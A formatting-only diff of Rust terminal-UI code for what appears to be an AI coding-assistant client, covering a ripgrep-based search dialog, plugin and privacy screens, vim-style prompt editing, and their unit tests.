@@ -1453,7 +1503,9 @@ fn render_rewind_confirm(frame: &mut Frame, message_idx: usize, area: Rect) {
         Line::from(vec![
             Span::styled(
                 "  [y] ",
-                Style::default().fg(Color::Green).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Green)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::raw("Yes, rewind"),
             Span::raw("    "),
@@ -1526,7 +1578,9 @@ impl GlobalSearchState {
         self.selected = 0;
     }
 
-    pub fn close(&mut self) { self.open = false; }
+    pub fn close(&mut self) {
+        self.open = false;
+    }
 
     pub fn select_prev(&mut self) {
         let count = self.results.len();
@@ -1568,8 +1622,10 @@ impl GlobalSearchState {
         let output = std::process::Command::new("rg")
             .args([
                 "--json",
-                "--max-count", "10",
-                "--max-filesize", "1M",
+                "--max-count",
+                "10",
+                "--max-filesize",
+                "1M",
                 &self.query,
                 ".",
             ])
@@ -1588,7 +1644,11 @@ impl GlobalSearchState {
                             let data = &val["data"];
                             let file = data["path"]["text"].as_str().unwrap_or("").to_string();
                             let line_no = data["line_number"].as_u64().unwrap_or(0) as u32;
-                            let text = data["lines"]["text"].as_str().unwrap_or("").trim_end_matches('\n').to_string();
+                            let text = data["lines"]["text"]
+                                .as_str()
+                                .unwrap_or("")
+                                .trim_end_matches('\n')
+                                .to_string();
                             let col = data["submatches"][0]["start"].as_u64().unwrap_or(0) as u32;
                             self.results.push(SearchResult {
                                 file,
@@ -1599,7 +1659,9 @@ impl GlobalSearchState {
                                 context_after: Vec::new(),
                             });
                             self.total_matches += 1;
-                            if self.results.len() >= 500 { break; }
+                            if self.results.len() >= 500 {
+                                break;
+                            }
                         }
                         _ => {}
                     }
@@ -1610,12 +1672,18 @@ impl GlobalSearchState {
 
     /// Return the selected result as a `file:line` string for prompt injection.
     pub fn selected_ref(&self) -> Option<String> {
-        self.results.get(self.selected).map(|r| format!("{}:{}", r.file, r.line))
+        self.results
+            .get(self.selected)
+            .map(|r| format!("{}:{}", r.file, r.line))
     }
 }
 
 /// Render the global search dialog overlay.
-pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Rect, buf: &mut ratatui::buffer::Buffer) {
+pub fn render_global_search(
+    state: &GlobalSearchState,
+    area: ratatui::layout::Rect,
+    buf: &mut ratatui::buffer::Buffer,
+) {
     use ratatui::{
         layout::Rect,
         style::{Color, Modifier, Style},
@@ -1624,13 +1692,20 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
     };
     use std::path::Path;
 
-    if !state.open { return; }
+    if !state.open {
+        return;
+    }
 
     let w = (area.width * 4 / 5).max(40).min(area.width);
     let h = (area.height * 3 / 4).max(10).min(area.height);
     let x = area.x + (area.width - w) / 2;
     let y = area.y + (area.height - h) / 4;
-    let dialog = Rect { x, y, width: w, height: h };
+    let dialog = Rect {
+        x,
+        y,
+        width: w,
+        height: h,
+    };
 
     Clear.render(dialog, buf);
     Block::default()
@@ -1653,7 +1728,12 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
         Span::styled("\u{2588}", Style::default().fg(Color::Cyan)),
     ]);
     Paragraph::new(query_line).render(
-        Rect { x: inner.x, y: inner.y, width: inner.width, height: 1 },
+        Rect {
+            x: inner.x,
+            y: inner.y,
+            width: inner.width,
+            height: 1,
+        },
         buf,
     );
 
@@ -1663,7 +1743,12 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
         Style::default().fg(Color::DarkGray),
     ));
     Paragraph::new(sep).render(
-        Rect { x: inner.x, y: inner.y + 1, width: inner.width, height: 1 },
+        Rect {
+            x: inner.x,
+            y: inner.y + 1,
+            width: inner.width,
+            height: 1,
+        },
         buf,
     );
 
@@ -1717,17 +1802,22 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
 
     let max_visible = results_area.height as usize;
     // Scroll so the selected result is visible — find which display row it's in
-    let selected_display_row = rows.iter().position(|r| {
-        if let DisplayRow::Result { result_idx } = r {
-            *result_idx == state.selected
-        } else {
-            false
-        }
-    }).unwrap_or(0);
+    let selected_display_row = rows
+        .iter()
+        .position(|r| {
+            if let DisplayRow::Result { result_idx } = r {
+                *result_idx == state.selected
+            } else {
+                false
+            }
+        })
+        .unwrap_or(0);
     let start = selected_display_row.saturating_sub(max_visible / 2);
 
     for (i, row) in rows[start..].iter().enumerate() {
-        if i >= max_visible { break; }
+        if i >= max_visible {
+            break;
+        }
         let row_y = results_area.y + i as u16;
 
         match row {
@@ -1737,14 +1827,24 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
                 let label_part = format!(" {} ", label);
                 let dashes_right = (results_area.width as usize)
                     .saturating_sub(4 + label_part.len() + count_str.len());
-                let header_line = Line::from(vec![
-                    Span::styled(
-                        format!("\u{2500}\u{2500}\u{2500}{}{}{}", label_part, count_str, "\u{2500}".repeat(dashes_right)),
-                        Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                let header_line = Line::from(vec![Span::styled(
+                    format!(
+                        "\u{2500}\u{2500}\u{2500}{}{}{}",
+                        label_part,
+                        count_str,
+                        "\u{2500}".repeat(dashes_right)
                     ),
-                ]);
+                    Style::default()
+                        .fg(Color::Yellow)
+                        .add_modifier(Modifier::BOLD),
+                )]);
                 Paragraph::new(header_line).render(
-                    Rect { x: results_area.x, y: row_y, width: results_area.width, height: 1 },
+                    Rect {
+                        x: results_area.x,
+                        y: row_y,
+                        width: results_area.width,
+                        height: 1,
+                    },
                     buf,
                 );
             }
@@ -1753,7 +1853,9 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
                 let selected = *result_idx == state.selected;
                 let prefix = if selected { "> " } else { "  " };
                 let style = if selected {
-                    Style::default().add_modifier(Modifier::BOLD).fg(Color::White)
+                    Style::default()
+                        .add_modifier(Modifier::BOLD)
+                        .fg(Color::White)
                 } else {
                     Style::default().fg(Color::Gray)
                 };
@@ -1764,14 +1866,21 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
                 let text_spans: Vec<Span<'static>> = if !query_lc.is_empty() {
                     let text_lc = text_trimmed.to_lowercase();
                     if let Some(pos) = text_lc.find(query_lc.as_str()) {
-                        let before: String = text_trimmed.chars().take(
-                            text_trimmed[..pos].chars().count()
-                        ).collect();
+                        let before: String = text_trimmed
+                            .chars()
+                            .take(text_trimmed[..pos].chars().count())
+                            .collect();
                         let matched: String = text_trimmed[pos..pos + query_lc.len()].to_string();
-                        let after: String = text_trimmed[pos + query_lc.len()..].chars().take(30).collect();
+                        let after: String = text_trimmed[pos + query_lc.len()..]
+                            .chars()
+                            .take(30)
+                            .collect();
                         vec![
                             Span::styled(before, style),
-                            Span::styled(matched, style.bg(Color::Rgb(60, 50, 0)).fg(Color::Yellow)),
+                            Span::styled(
+                                matched,
+                                style.bg(Color::Rgb(60, 50, 0)).fg(Color::Yellow),
+                            ),
                             Span::styled(after, style),
                         ]
                     } else {
@@ -1785,15 +1894,17 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
 
                 let mut spans = vec![
                     Span::styled(prefix.to_string(), style),
-                    Span::styled(
-                        format!("{:>4}  ", result.line),
-                        style.fg(Color::DarkGray),
-                    ),
+                    Span::styled(format!("{:>4}  ", result.line), style.fg(Color::DarkGray)),
                 ];
                 spans.extend(text_spans);
 
                 Paragraph::new(Line::from(spans)).render(
-                    Rect { x: results_area.x, y: row_y, width: results_area.width, height: 1 },
+                    Rect {
+                        x: results_area.x,
+                        y: row_y,
+                        width: results_area.width,
+                        height: 1,
+                    },
                     buf,
                 );
             }
@@ -1806,14 +1917,33 @@ pub fn render_global_search(state: &GlobalSearchState, area: ratatui::layout::Re
     } else if state.results.is_empty() && !state.query.is_empty() {
         "No matches".to_string()
     } else if state.total_matches > 0 {
-        format!("{} matches in {} files", state.total_matches,
-            state.results.iter().map(|r| &r.file).collect::<std::collections::HashSet<_>>().len())
+        format!(
+            "{} matches in {} files",
+            state.total_matches,
+            state
+                .results
+                .iter()
+                .map(|r| &r.file)
+                .collect::<std::collections::HashSet<_>>()
+                .len()
+        )
     } else {
         "Type to search".to_string()
     };
     let status_y = inner.y + inner.height.saturating_sub(1);
-    Paragraph::new(Line::from(vec![Span::styled(status, Style::default().fg(Color::DarkGray))]))
-        .render(Rect { x: inner.x, y: status_y, width: inner.width, height: 1 }, buf);
+    Paragraph::new(Line::from(vec![Span::styled(
+        status,
+        Style::default().fg(Color::DarkGray),
+    )]))
+    .render(
+        Rect {
+            x: inner.x,
+            y: status_y,
+            width: inner.width,
+            height: 1,
+        },
+        buf,
+    );
 }
 
 // ============================================================================
@@ -1851,8 +1981,8 @@ mod tests {
     #[test]
     fn help_overlay_filter() {
         let mut h = HelpOverlay::new();
-        h.push_filter_char('h', );
-        h.push_filter_char('e', );
+        h.push_filter_char('h');
+        h.push_filter_char('e');
         assert_eq!(h.filter, "he");
         h.pop_filter_char();
         assert_eq!(h.filter, "h");
@@ -1872,7 +2002,11 @@ mod tests {
     #[test]
     fn history_search_update_matches() {
         // All three entries contain 'g', so all three match.
-        let history = vec!["git commit".to_string(), "cargo build".to_string(), "git push".to_string()];
+        let history = vec![
+            "git commit".to_string(),
+            "cargo build".to_string(),
+            "git push".to_string(),
+        ];
         let mut hs = HistorySearchOverlay::open(&history);
         hs.push_char('g', &history);
         assert_eq!(hs.matches.len(), 3);
@@ -1953,10 +2087,7 @@ mod tests {
     fn subseq_score_sorts_correctly_in_overlay() {
         // "git commit" and "get items together" both match query "git".
         // "git commit" is a substring match → higher score → appears first.
-        let history = vec![
-            "get items together".to_string(),
-            "git commit".to_string(),
-        ];
+        let history = vec!["get items together".to_string(), "git commit".to_string()];
         let mut hs = HistorySearchOverlay::open(&history);
         hs.push_char('g', &history);
         hs.push_char('i', &history);
@@ -2034,8 +2165,18 @@ mod tests {
     #[test]
     fn message_selector_open_selects_last() {
         let msgs = vec![
-            SelectorMessage { idx: 0, role: "user".to_string(), preview: "hi".to_string(), has_tool_use: false },
-            SelectorMessage { idx: 1, role: "assistant".to_string(), preview: "hello".to_string(), has_tool_use: false },
+            SelectorMessage {
+                idx: 0,
+                role: "user".to_string(),
+                preview: "hi".to_string(),
+                has_tool_use: false,
+            },
+            SelectorMessage {
+                idx: 1,
+                role: "assistant".to_string(),
+                preview: "hello".to_string(),
+                has_tool_use: false,
+            },
         ];
         let sel = MessageSelectorOverlay::open(msgs);
         assert_eq!(sel.selected_idx, 1);
@@ -2044,9 +2185,24 @@ mod tests {
     #[test]
     fn message_selector_navigate() {
         let msgs = vec![
-            SelectorMessage { idx: 0, role: "user".to_string(), preview: "a".to_string(), has_tool_use: false },
-            SelectorMessage { idx: 1, role: "assistant".to_string(), preview: "b".to_string(), has_tool_use: false },
-            SelectorMessage { idx: 2, role: "user".to_string(), preview: "c".to_string(), has_tool_use: false },
+            SelectorMessage {
+                idx: 0,
+                role: "user".to_string(),
+                preview: "a".to_string(),
+                has_tool_use: false,
+            },
+            SelectorMessage {
+                idx: 1,
+                role: "assistant".to_string(),
+                preview: "b".to_string(),
+                has_tool_use: false,
+            },
+            SelectorMessage {
+                idx: 2,
+                role: "user".to_string(),
+                preview: "c".to_string(),
+                has_tool_use: false,
+            },
         ];
         let mut sel = MessageSelectorOverlay::open(msgs);
         // starts at last
@@ -2063,21 +2219,30 @@ mod tests {
 
     #[test]
     fn rewind_flow_confirm_advances_step() {
-        let msgs = vec![
-            SelectorMessage { idx: 0, role: "user".to_string(), preview: "hi".to_string(), has_tool_use: false },
-        ];
+        let msgs = vec![SelectorMessage {
+            idx: 0,
+            role: "user".to_string(),
+            preview: "hi".to_string(),
+            has_tool_use: false,
+        }];
         let mut flow = RewindFlowOverlay::new();
         flow.open(msgs);
         let idx = flow.confirm_selection().unwrap();
         assert_eq!(idx, 0);
-        assert!(matches!(flow.step, RewindStep::Confirming { message_idx: 0 }));
+        assert!(matches!(
+            flow.step,
+            RewindStep::Confirming { message_idx: 0 }
+        ));
     }
 
     #[test]
     fn rewind_flow_accept_closes() {
-        let msgs = vec![
-            SelectorMessage { idx: 3, role: "user".to_string(), preview: "test".to_string(), has_tool_use: false },
-        ];
+        let msgs = vec![SelectorMessage {
+            idx: 3,
+            role: "user".to_string(),
+            preview: "test".to_string(),
+            has_tool_use: false,
+        }];
         let mut flow = RewindFlowOverlay::new();
         flow.open(msgs);
         flow.confirm_selection();
@@ -2088,9 +2253,12 @@ mod tests {
 
     #[test]
     fn rewind_flow_reject_returns_to_selector() {
-        let msgs = vec![
-            SelectorMessage { idx: 0, role: "user".to_string(), preview: "x".to_string(), has_tool_use: false },
-        ];
+        let msgs = vec![SelectorMessage {
+            idx: 0,
+            role: "user".to_string(),
+            preview: "x".to_string(),
+            has_tool_use: false,
+        }];
         let mut flow = RewindFlowOverlay::new();
         flow.open(msgs);
         flow.confirm_selection();

--- a/src-rust/crates/tui/src/plugin_views.rs
+++ b/src-rust/crates/tui/src/plugin_views.rs
@@ -40,11 +40,7 @@ impl PluginHintBanner {
 
 /// Render the first undismissed plugin hint banner into `area`.
 /// Returns the height consumed (0 if nothing rendered).
-pub fn render_plugin_hints(
-    frame: &mut Frame,
-    hints: &[PluginHintBanner],
-    area: Rect,
-) -> u16 {
+pub fn render_plugin_hints(frame: &mut Frame, hints: &[PluginHintBanner], area: Rect) -> u16 {
     let hint = match hints.iter().find(|h| h.is_visible()) {
         Some(h) => h,
         None => return 0,
@@ -71,14 +67,12 @@ pub fn render_plugin_hints(
         content
     };
 
-    let lines = vec![Line::from(vec![
-        Span::styled(
-            display,
-            Style::default()
-                .fg(Color::White)
-                .add_modifier(Modifier::ITALIC),
-        ),
-    ])];
+    let lines = vec![Line::from(vec![Span::styled(
+        display,
+        Style::default()
+            .fg(Color::White)
+            .add_modifier(Modifier::ITALIC),
+    )])];
 
     frame.render_widget(Clear, banner_area);
     let para = Paragraph::new(lines).block(
@@ -183,7 +177,10 @@ pub struct PluginListState {
 
 impl PluginListState {
     pub fn new(items: Vec<PluginListItem>) -> Self {
-        Self { items, ..Default::default() }
+        Self {
+            items,
+            ..Default::default()
+        }
     }
 
     pub fn move_up(&mut self) {
@@ -227,10 +224,7 @@ pub fn render_plugin_list(
     }
 
     let items = &state.items;
-    let list_items: Vec<ListItem> = items
-        .iter()
-        .map(|p| ListItem::new(p.to_line()))
-        .collect();
+    let list_items: Vec<ListItem> = items.iter().map(|p| ListItem::new(p.to_line())).collect();
 
     let block_title = title.unwrap_or("Plugins");
     let total = items.len();
@@ -242,10 +236,7 @@ pub fn render_plugin_list(
         if area.height > detail_height + 3 {
             let chunks = Layout::default()
                 .direction(Direction::Vertical)
-                .constraints([
-                    Constraint::Min(3),
-                    Constraint::Length(detail_height),
-                ])
+                .constraints([Constraint::Min(3), Constraint::Length(detail_height)])
                 .split(area);
             (chunks[0], Some(chunks[1]))
         } else {
@@ -297,8 +288,16 @@ pub fn render_plugin_detail(frame: &mut Frame, item: &PluginListItem, area: Rect
         Style::default().fg(Color::DarkGray)
     };
 
-    let cmd_label = if item.command_count == 1 { "command" } else { "commands" };
-    let hook_label = if item.hook_count == 1 { "hook" } else { "hooks" };
+    let cmd_label = if item.command_count == 1 {
+        "command"
+    } else {
+        "commands"
+    };
+    let hook_label = if item.hook_count == 1 {
+        "hook"
+    } else {
+        "hooks"
+    };
 
     let lines: Vec<Line> = vec![
         Line::from(vec![
@@ -321,17 +320,20 @@ pub fn render_plugin_detail(frame: &mut Frame, item: &PluginListItem, area: Rect
         Line::from(vec![
             Span::styled("  Counts:  ", Style::default().fg(Color::Cyan)),
             Span::styled(
-                format!("{} {}  •  {} {}", item.command_count, cmd_label, item.hook_count, hook_label),
+                format!(
+                    "{} {}  •  {} {}",
+                    item.command_count, cmd_label, item.hook_count, hook_label
+                ),
                 Style::default().fg(Color::White),
             ),
         ]),
         Line::from(vec![]),
-        Line::from(vec![
-            Span::styled(
-                "  [Enter] toggle detail   [j/k] navigate",
-                Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
-            ),
-        ]),
+        Line::from(vec![Span::styled(
+            "  [Enter] toggle detail   [j/k] navigate",
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::ITALIC),
+        )]),
     ];
 
     let block = Block::default()

--- a/src-rust/crates/tui/src/privacy_screen.rs
+++ b/src-rust/crates/tui/src/privacy_screen.rs
@@ -187,15 +187,10 @@ pub fn render_privacy_screen(frame: &mut Frame, screen: &PrivacyScreen, area: Re
         // Label row with toggle
         lines.push(Line::from(vec![
             Span::raw(prefix),
-            Span::styled(
-                format!("{:<28}", toggle.label),
-                label_style,
-            ),
+            Span::styled(format!("{:<28}", toggle.label), label_style),
             Span::styled(
                 toggle_text.to_string(),
-                Style::default()
-                    .fg(toggle_fg)
-                    .add_modifier(Modifier::BOLD),
+                Style::default().fg(toggle_fg).add_modifier(Modifier::BOLD),
             ),
         ]));
 
@@ -263,10 +258,7 @@ fn word_wrap_str(text: &str, width: usize) -> Vec<String> {
 // ---------------------------------------------------------------------------
 
 /// Returns `true` if the key event was consumed by the privacy screen.
-pub fn handle_privacy_key(
-    screen: &mut PrivacyScreen,
-    key: crossterm::event::KeyEvent,
-) -> bool {
+pub fn handle_privacy_key(screen: &mut PrivacyScreen, key: crossterm::event::KeyEvent) -> bool {
     use crossterm::event::KeyCode;
 
     if !screen.visible {

--- a/src-rust/crates/tui/src/prompt_input.rs
+++ b/src-rust/crates/tui/src/prompt_input.rs
@@ -80,7 +80,11 @@ pub enum VimPendingState {
     /// Received operator (d/c/y), waiting for motion.
     Operator { op: VimOperator, count: usize },
     /// Received operator then additional count digits.
-    OperatorCount { op: VimOperator, count: usize, digits: String },
+    OperatorCount {
+        op: VimOperator,
+        count: usize,
+        digits: String,
+    },
     /// Received `dg`/`cg`/`yg`, waiting for second g key.
     OperatorG { op: VimOperator, count: usize },
     /// Received `f/F/t/T`, waiting for target char.
@@ -132,7 +136,10 @@ pub enum VimFindKind {
 #[derive(Clone, Debug)]
 pub enum DotRepeatAction {
     /// Insert text at current cursor (from i, a, A, o, O, s).
-    Insert { text: String, mode_after_insert: bool },
+    Insert {
+        text: String,
+        mode_after_insert: bool,
+    },
     /// Simplified: re-delete the same number of chars.
     DeleteChars { count: usize },
     /// Change: delete + insert.
@@ -162,31 +169,51 @@ fn motion_w(text: &str, cursor: usize) -> usize {
     let rest = &text[cursor..];
     let chars: Vec<char> = rest.chars().collect();
     let n = chars.len();
-    if n == 0 { return cursor; }
+    if n == 0 {
+        return cursor;
+    }
     let mut i = 0;
     if is_word_char(chars[0]) {
-        while i < n && is_word_char(chars[i]) { i += 1; }
+        while i < n && is_word_char(chars[i]) {
+            i += 1;
+        }
     } else if !chars[0].is_whitespace() {
-        while i < n && !is_word_char(chars[i]) && !chars[i].is_whitespace() { i += 1; }
+        while i < n && !is_word_char(chars[i]) && !chars[i].is_whitespace() {
+            i += 1;
+        }
     }
-    while i < n && chars[i].is_whitespace() { i += 1; }
+    while i < n && chars[i].is_whitespace() {
+        i += 1;
+    }
     cursor + char_idx_to_byte(rest, i)
 }
 
 /// `b` — start of previous word.
 fn motion_b(text: &str, cursor: usize) -> usize {
-    if cursor == 0 { return 0; }
+    if cursor == 0 {
+        return 0;
+    }
     let before = &text[..cursor];
     let chars: Vec<char> = before.chars().collect();
     let n = chars.len();
-    if n == 0 { return 0; }
+    if n == 0 {
+        return 0;
+    }
     let mut i = n;
-    while i > 0 && chars[i - 1].is_whitespace() { i -= 1; }
-    if i == 0 { return 0; }
+    while i > 0 && chars[i - 1].is_whitespace() {
+        i -= 1;
+    }
+    if i == 0 {
+        return 0;
+    }
     if is_word_char(chars[i - 1]) {
-        while i > 0 && is_word_char(chars[i - 1]) { i -= 1; }
+        while i > 0 && is_word_char(chars[i - 1]) {
+            i -= 1;
+        }
     } else {
-        while i > 0 && !is_word_char(chars[i - 1]) && !chars[i - 1].is_whitespace() { i -= 1; }
+        while i > 0 && !is_word_char(chars[i - 1]) && !chars[i - 1].is_whitespace() {
+            i -= 1;
+        }
     }
     char_idx_to_byte(before, i)
 }
@@ -198,16 +225,22 @@ fn motion_e(text: &str, cursor: usize) -> usize {
         .map(|(b, c)| (cursor + b, c))
         .collect();
     let n = chars.len();
-    if n == 0 { return cursor; }
+    if n == 0 {
+        return cursor;
+    }
     let at_end = n == 1
         || chars[1].1.is_whitespace()
         || is_word_char(chars[0].1) != is_word_char(chars[1].1);
     let mut i = 0;
     if at_end {
         i = 1;
-        while i < n && chars[i].1.is_whitespace() { i += 1; }
+        while i < n && chars[i].1.is_whitespace() {
+            i += 1;
+        }
     }
-    if i >= n { return cursor; }
+    if i >= n {
+        return cursor;
+    }
     let wc = is_word_char(chars[i].1);
     while i + 1 < n && !chars[i + 1].1.is_whitespace() && is_word_char(chars[i + 1].1) == wc {
         i += 1;
@@ -221,23 +254,35 @@ fn motion_W(text: &str, cursor: usize) -> usize {
     let rest = &text[cursor..];
     let chars: Vec<char> = rest.chars().collect();
     let n = chars.len();
-    if n == 0 { return cursor; }
+    if n == 0 {
+        return cursor;
+    }
     let mut i = 0;
-    while i < n && !chars[i].is_whitespace() { i += 1; }
-    while i < n && chars[i].is_whitespace() { i += 1; }
+    while i < n && !chars[i].is_whitespace() {
+        i += 1;
+    }
+    while i < n && chars[i].is_whitespace() {
+        i += 1;
+    }
     cursor + char_idx_to_byte(rest, i)
 }
 
 /// `B` — start of previous WORD.
 #[allow(non_snake_case)]
 fn motion_B(text: &str, cursor: usize) -> usize {
-    if cursor == 0 { return 0; }
+    if cursor == 0 {
+        return 0;
+    }
     let before = &text[..cursor];
     let chars: Vec<char> = before.chars().collect();
     let n = chars.len();
     let mut i = n;
-    while i > 0 && chars[i - 1].is_whitespace() { i -= 1; }
-    while i > 0 && !chars[i - 1].is_whitespace() { i -= 1; }
+    while i > 0 && chars[i - 1].is_whitespace() {
+        i -= 1;
+    }
+    while i > 0 && !chars[i - 1].is_whitespace() {
+        i -= 1;
+    }
     char_idx_to_byte(before, i)
 }
 
@@ -249,15 +294,23 @@ fn motion_E(text: &str, cursor: usize) -> usize {
         .map(|(b, c)| (cursor + b, c))
         .collect();
     let n = chars.len();
-    if n == 0 { return cursor; }
+    if n == 0 {
+        return cursor;
+    }
     let at_end = n == 1 || chars[1].1.is_whitespace();
     let mut i = 0;
     if at_end {
         i = 1;
-        while i < n && chars[i].1.is_whitespace() { i += 1; }
+        while i < n && chars[i].1.is_whitespace() {
+            i += 1;
+        }
     }
-    if i >= n { return cursor; }
-    while i + 1 < n && !chars[i + 1].1.is_whitespace() { i += 1; }
+    if i >= n {
+        return cursor;
+    }
+    while i + 1 < n && !chars[i + 1].1.is_whitespace() {
+        i += 1;
+    }
     chars[i].0
 }
 
@@ -282,7 +335,9 @@ fn motion_G(text: &str) -> usize {
 
 /// `gg` / line-N — go to start of line `line_num` (1-indexed; 0 or 1 → start of text).
 fn motion_gg(text: &str, line_num: usize) -> usize {
-    if line_num <= 1 { return 0; }
+    if line_num <= 1 {
+        return 0;
+    }
     let mut line = 1usize;
     for (b, c) in text.char_indices() {
         if c == '\n' {
@@ -305,7 +360,10 @@ fn motion_find_char(
 ) -> Option<usize> {
     match kind {
         VimFindKind::F | VimFindKind::T => {
-            let search_start = text[cursor..].char_indices().nth(1).map(|(b, _)| cursor + b)?;
+            let search_start = text[cursor..]
+                .char_indices()
+                .nth(1)
+                .map(|(b, _)| cursor + b)?;
             let mut hits = 0usize;
             for (b, c) in text[search_start..].char_indices() {
                 if c == target {
@@ -332,7 +390,11 @@ fn motion_find_char(
                     hits += 1;
                     if hits == count {
                         if matches!(kind, VimFindKind::BigT) {
-                            return text[b..].char_indices().nth(1).map(|(nb, _)| b + nb).or(Some(cursor));
+                            return text[b..]
+                                .char_indices()
+                                .nth(1)
+                                .map(|(nb, _)| b + nb)
+                                .or(Some(cursor));
                         }
                         return Some(b);
                     }
@@ -345,16 +407,16 @@ fn motion_find_char(
 
 /// Convert text region to uppercase.
 fn uppercase_region(text: &str) -> String {
-    text.chars().map(|c| {
-        c.to_uppercase().next().unwrap_or(c)
-    }).collect()
+    text.chars()
+        .map(|c| c.to_uppercase().next().unwrap_or(c))
+        .collect()
 }
 
 /// Convert text region to lowercase.
 fn lowercase_region(text: &str) -> String {
-    text.chars().map(|c| {
-        c.to_lowercase().next().unwrap_or(c)
-    }).collect()
+    text.chars()
+        .map(|c| c.to_lowercase().next().unwrap_or(c))
+        .collect()
 }
 
 /// Apply an operator (d/c/y/gU/gu) to the range [from, to) in text.
@@ -375,7 +437,12 @@ fn apply_operator_range(
         VimOperator::Yank => (text.to_string(), from),
         VimOperator::Delete => {
             let new_text = format!("{}{}", &text[..from], &text[to..]);
-            let new_cursor = from.min(new_text.len().saturating_sub(if new_text.is_empty() { 0 } else { 1 }));
+            let new_cursor =
+                from.min(
+                    new_text
+                        .len()
+                        .saturating_sub(if new_text.is_empty() { 0 } else { 1 }),
+                );
             (new_text, new_cursor)
         }
         VimOperator::Change => {
@@ -419,21 +486,17 @@ pub fn apply_vim_key(
     }
 
     match std::mem::replace(pending, VimPendingState::None) {
-        VimPendingState::None => {
-            vim_idle(mode, text, cursor, key, yank_buf, pending, last_find)
-        }
-        VimPendingState::Count { digits } => {
-            vim_count(mode, text, cursor, key, yank_buf, pending, last_find, digits)
-        }
-        VimPendingState::G { count } => {
-            vim_g(text, cursor, key, pending, count)
-        }
-        VimPendingState::Operator { op, count } => {
-            vim_operator(mode, text, cursor, key, yank_buf, pending, last_find, op, count)
-        }
-        VimPendingState::OperatorCount { op, count, digits } => {
-            vim_operator_count(mode, text, cursor, key, yank_buf, pending, last_find, op, count, digits)
-        }
+        VimPendingState::None => vim_idle(mode, text, cursor, key, yank_buf, pending, last_find),
+        VimPendingState::Count { digits } => vim_count(
+            mode, text, cursor, key, yank_buf, pending, last_find, digits,
+        ),
+        VimPendingState::G { count } => vim_g(text, cursor, key, pending, count),
+        VimPendingState::Operator { op, count } => vim_operator(
+            mode, text, cursor, key, yank_buf, pending, last_find, op, count,
+        ),
+        VimPendingState::OperatorCount { op, count, digits } => vim_operator_count(
+            mode, text, cursor, key, yank_buf, pending, last_find, op, count, digits,
+        ),
         VimPendingState::OperatorG { op, count } => {
             vim_operator_g(mode, text, cursor, key, yank_buf, op, count)
         }
@@ -453,13 +516,23 @@ pub fn apply_vim_key(
                 let mut modified = false;
                 let mut pos = *cursor;
                 for _ in 0..count.max(1) {
-                    if pos >= text.len() { break; }
-                    let clen = text[pos..].chars().next().map(|ch| ch.len_utf8()).unwrap_or(1);
+                    if pos >= text.len() {
+                        break;
+                    }
+                    let clen = text[pos..]
+                        .chars()
+                        .next()
+                        .map(|ch| ch.len_utf8())
+                        .unwrap_or(1);
                     text.replace_range(pos..pos + clen, &c.to_string());
                     pos += c.len_utf8();
                     modified = true;
                 }
-                *cursor = (*cursor).min(text.len().saturating_sub(if text.is_empty() { 0 } else { 1 }));
+                *cursor =
+                    (*cursor).min(
+                        text.len()
+                            .saturating_sub(if text.is_empty() { 0 } else { 1 }),
+                    );
                 modified
             } else {
                 false
@@ -472,13 +545,17 @@ pub fn apply_vim_key(
                 let mut new_lines: Vec<String> = text.split('\n').map(|s| s.to_string()).collect();
                 for i in 0..count.max(1) {
                     let idx = current_line + i;
-                    if idx >= new_lines.len() { break; }
+                    if idx >= new_lines.len() {
+                        break;
+                    }
                     if dir == '>' {
                         new_lines[idx] = format!("{}{}", indent, new_lines[idx]);
                     } else if new_lines[idx].starts_with(indent) {
                         new_lines[idx] = new_lines[idx][indent.len()..].to_string();
                     } else {
-                        let trimmed = new_lines[idx].trim_start_matches('\t').trim_start_matches(' ');
+                        let trimmed = new_lines[idx]
+                            .trim_start_matches('\t')
+                            .trim_start_matches(' ');
                         new_lines[idx] = trimmed.to_string();
                     }
                 }
@@ -513,7 +590,9 @@ fn vim_idle(
     if key.len() == 1 {
         let ch = key.chars().next().unwrap();
         if ch.is_ascii_digit() && ch != '0' {
-            *pending = VimPendingState::Count { digits: key.to_string() };
+            *pending = VimPendingState::Count {
+                digits: key.to_string(),
+            };
             return false;
         }
     }
@@ -533,7 +612,9 @@ fn vim_count(
     if key.len() == 1 && key.chars().next().unwrap().is_ascii_digit() {
         let new_digits = format!("{}{}", digits, key);
         let count: usize = new_digits.parse().unwrap_or(10000).min(10000);
-        *pending = VimPendingState::Count { digits: count.to_string() };
+        *pending = VimPendingState::Count {
+            digits: count.to_string(),
+        };
         return false;
     }
     let count: usize = digits.parse().unwrap_or(1);
@@ -554,26 +635,47 @@ fn vim_normal(
     let n = count.max(1);
     match key {
         // ---- Mode transitions ----
-        "i" => { *mode = VimMode::Insert; false }
+        "i" => {
+            *mode = VimMode::Insert;
+            false
+        }
         "a" => {
             *mode = VimMode::Insert;
             if *cursor < text.len() {
-                *cursor = text[*cursor..].char_indices().nth(1).map(|(b, _)| *cursor + b).unwrap_or(text.len());
+                *cursor = text[*cursor..]
+                    .char_indices()
+                    .nth(1)
+                    .map(|(b, _)| *cursor + b)
+                    .unwrap_or(text.len());
             }
             false
         }
-        "I" => { *mode = VimMode::Insert; *cursor = motion_first_nonblank(text, *cursor); false }
-        "A" => {
+        "I" => {
             *mode = VimMode::Insert;
-            *cursor = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len());
+            *cursor = motion_first_nonblank(text, *cursor);
             false
         }
-        "v" => { *mode = VimMode::Visual; false }
+        "A" => {
+            *mode = VimMode::Insert;
+            *cursor = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
+            false
+        }
+        "v" => {
+            *mode = VimMode::Visual;
+            false
+        }
         // ---- Simple motions ----
         "h" => {
